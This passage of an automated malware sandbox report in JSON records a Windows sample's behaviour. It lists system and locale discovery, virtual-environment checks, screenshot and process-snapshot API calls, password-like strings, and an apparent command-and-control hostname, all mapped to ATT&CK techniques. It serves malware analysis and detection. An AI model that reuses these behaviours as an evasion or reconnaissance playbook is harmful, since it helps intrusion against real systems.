"identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"Webfrequency.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00001812)\n \"RegAsm.exe\" called \"GetLocaleInfoW\" with parameter \"9\" - (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"GetLocaleInfoA\" with parameter \"1024\" - (UID: 00000000-00000352)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"PostMessage\" (Indicator: \"postmessage\"; Source: \"00000000-00002568-00000C29-1926814255\")\n Found reference to API \"PostMessageW\" (Indicator: \"postmessage\"; Source: \"00000000-00002568-00000C29-1926814911\")\n Found reference to API \"sendMessageChannelCache\" (Indicator: \"sendmessage\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to API \"System.ServiceModel.Activities.Configuration.SendMessageChannelCacheElement, System.ServiceModel.Activities, Version=<IPv4>, Culture=neutral, PublicKeyToken=31bf3856ad364e35\" (Indicator: \"sendmessage\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to API \"sendMessageChannelCache\" (Indicator: \"sendmessage\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found reference to API \"System.ServiceModel.Activities.Configuration.SendMessageChannelCacheElement, System.ServiceModel.Activities, Version=<IPv4>, Culture=neutral, PublicKeyToken=31bf3856ad364e35\" (Indicator: \"sendmessage\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002568)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-659", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using API string", "description": "Found string \"NtQuerySystemInformation\" (Indicator: \"NtQuerySystemInformation\"; Source: \"00000000-00002568-00000C29-1909119230\")", "origin": "File/Memory", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" queries volume information of \"C:\\02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" at 00000000-00002568-0000010C-2539927\n \"Webfrequency.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Webdevelop\\Webfrequency.exe\" at 00000000-00001812-0000010C-3282711\n \"RegAsm.exe\" queries volume information of \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe\" at 00000000-00000352-0000010C-3331268\n \"RegAsm.exe\" queries volume information of \"C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\CustomMarshalers\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\CustomMarshalers.dll\" at 00000000-00000352-0000010C-14486530\n \"Webfrequency.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Webdevelop\\Webfrequency.exe\" at 00000000-00004536-0000010C-4779538", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000074013200000000000600000000000000500132001a000000982a3600000000001a000000000000001400000000000000000000000000000000000000000000000200000288bb3400630400670000000000000000000000008000000000000000aa26008c800336000100000000000000020000000c000000b8af3500b8af3500b3af350000000000000000000000320000000001f4f028000000000014f7280095e1c877a99b3400feffffff435ccc775059cc7794000000a0000000b2af3500b0af35009400000098f22800fdfeef7518000000ea341a2dc3860e6dc8032800 (UID: 00000000-00002568)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"IsWow64Process\" with parameter \"2568\" - (UID: 00000000-00002568)\n \"Webfrequency.exe\" called \"IsWow64Process\" with parameter \"1812\" - (UID: 00000000-00001812)\n \"RegAsm.exe\" called \"IsWow64Process\" with parameter \"352\" - (UID: 00000000-00000352)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"Webfrequency.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00002568)\n \"Webfrequency.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00001812)\n \"RegAsm.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00000352)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"GetForegroundWindow\" (UID: 00000000-00002568)\n \"RegAsm.exe\" called \"GetForegroundWindow\" (UID: 00000000-00000352)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"Webfrequency.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\WEBFREQUENCY.EXE\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\WEBFREQUENCY.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"RegAsm.exe\" called \"GetWindowTextA\" (UID: 00000000-00000352)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"osoft Enhanced RSA and AES Cryptographic Provider\" (Indicator: \"aes\"; Source: \"00000000-00001812.00000000.186728.00320000.00000004.mdmp\")\n Found string \"FTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced RSA and AES Cryptographic Provider\" (Indicator: \"aes\"; Source: \"00000000-00001812.00000000.186728.00320000.00000004.mdmp\")\n Found string \"icrosoft Enhanced RSA and AES Cryptographic Provider\" (Indicator: \"aes\"; Source: \"00000000-00001812.00000000.186728.00320000.00000004.mdmp, 00000000-00001812.00000001.188519.00320000.00000004.mdmp\")\n Found string \"Microsoft Enhanced RSA and AES Cryptographic Provider\" (Indicator: \"aes\"; Source: \"00000000-00001812.00000000.186728.00320000.00000004.mdmp, 00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"description=\"Uses RsaCryptoServiceProvider to encrypt and decrypt\"\" (Indicator: \"RsaCryptoServiceProvider\"; Source: \"00000000-00001812.00000000.186728.00320000.00000004.mdmp\")\n Found string \"Switch.System.Security.Cryptography.DoNotAddrOfCspParentWindowHandle\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"Switch.System.Security.Cryptography.UseLegacyFipsThrow\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.RandomNumberGenerator\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"Uses RsaCryptoServiceProvider to encrypt and decrypt\" (Indicator: \"RsaCryptoServiceProvider\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA1\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.AesCryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"aes\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.AesCryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"aescryptoserviceprovider\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.AesCryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.RSACng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.DSACng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.AesManaged, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"aes\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.AesManaged, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.ECDiffieHellmanCng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.ECDsaCng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"ecdsa\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.ECDsaCng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.MD5Cng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA1Cng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA256Cng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA256CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA384Cng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA384CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA512Cng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA512CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.DpapiDataProtector, System.Security, Version=<IPv4>, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\\\* (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter NETFXSBS10.exe (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter netfxsbs12.hkf (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbscmp10.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbscmp20_mscorwks.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbscmp20_perfcounter.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbs_diasymreader.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbs_iehost.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.jscript.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.vsa.vb.codedomprocessor.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbs_mscordbi.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbs_mscorrc.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbs_mscorsec.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbs_system.configuration.install.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbs_system.data.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbs_system.enterpriseservices.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbs_VsaVb7rt.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter sbs_wminet_utils.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter SharedReg12.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter v1.0.3705 (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter v1.1.4322 (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"FindNextFileW\" with parameter v2.0.50727 (UID: 00000000-00002568)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"Webfrequency.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"369164879\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"Webfrequency.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"2969635156\"\n \"cx\": \"1\"\n \"cy\": \"1\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-475", "type": 2, "relevance": 1, "name": "Contains string like password/secret", "description": "Found string \"passwordFormat=\"Hashed\"\" (Indicator: \"password\"; Source: \"00000000-00001812.00000000.186728.00320000.00000004.mdmp\")\n Found string \"passwordAttemptWindow=\"10\"\" (Indicator: \"password\"; Source: \"00000000-00001812.00000000.186728.00320000.00000004.mdmp\")\n Found string \"passwordStrengthRegularExpression=\"\" />\" (Indicator: \"password\"; Source: \"00000000-00001812.00000000.186728.00320000.00000004.mdmp\")\n Found string \"passwordFormat\" (Indicator: \"password\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"passwordAttemptWindow\" (Indicator: \"password\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"passwordStrengthRegularExpression\" (Indicator: \"password\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found string \"passwordFormat\" (Indicator: \"password\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found string \"passwordAttemptWindow\" (Indicator: \"password\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found string \"passwordStrengthRegularExpression\" (Indicator: \"password\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found string \"passwordFormat=\"Hashed\"\" (Indicator: \"password\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found string \"passwordAttemptWindow=\"10\"\" (Indicator: \"password\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found string \"passwordStrengthRegularExpression=\"\" />\" (Indicator: \"password\"; Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-311", "type": 2, "relevance": 1, "name": "Contains ability to retrieve entry point of a process loaded into memory (API string)", "description": "Found reference to API \"AddressOfEntryPoint\" (Indicator: \"AddressOfEntryPoint\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-107", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the host's architecture (API string)", "description": "Found reference to API \"GetEnvironmentVariable\" (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"Webfrequency.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"RegAsm.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "registry-106", "type": 3, "relevance": 3, "name": "Read system defined device setup information from registry", "description": "\"Webfrequency.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CLASS\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0002\"; Key: \"PRUNINGMODE\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"(k.mh\"\n Pattern match: \"www.digicert.com1$0\"\n Pattern match: \"www.digicert.com110/\"\n Pattern match: \"http://ocsp.digicert.com0c\"\n Pattern match: \"cacerts.digicert.com/digicertassuredidrootca.crt0\"\n Pattern match: \"crl4.digicert.com/digicertassuredidrootca.crl0\"\n Pattern match: \"crl3.digicert.com/digicertassuredidrootca.crl0o\"\n Pattern match: \"https://www.digicert.com/cps0\"\n Pattern match: \"http://crl3.digicert.com/sha2-assured-cs-g1.crl05\"\n Pattern match: \"http://crl4.digicert.com/sha2-assured-cs-g1.crl0l\"\n Pattern match: \"http://ocsp.digicert.com0n\"\n Pattern match: \"cacerts.digicert.com/digicertsha2assuredidcodesigningca.crt0\"\n Pattern match: \"http://ts-ocsp.ws.symantec.com07\"\n Pattern match: \"http://ts-aia.ws.symantec.com/tss-ca-g2.cer0\"\n Pattern match: \"http://ts-crl.ws.symantec.com/tss-ca-g2.crl0\"\n Pattern match: \"http://ocsp.thawte.com0\"\n Pattern match: \"http://crl.thawte.com/thawtetimestampingca.crl0\"\n Pattern match: \"http://www.mozilla.com0\"\n Pattern match: \"qjfhyibnu.dg/&]d?.]z;vsbnj6*|=^\"\n Heuristic match: \"doddyfire.dyndns.org\"\n Pattern match: \"microsoft.net/framework/v4.0.30319/\"\n Pattern match: \"http://go.microsoft.com/fwlink/?linkid=42127\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#dsa-sha1\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#rsa-sha256\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#rsa-sha384\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#rsa-sha512\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#sha1\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#sha256\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#sha512\"\n Pattern match: 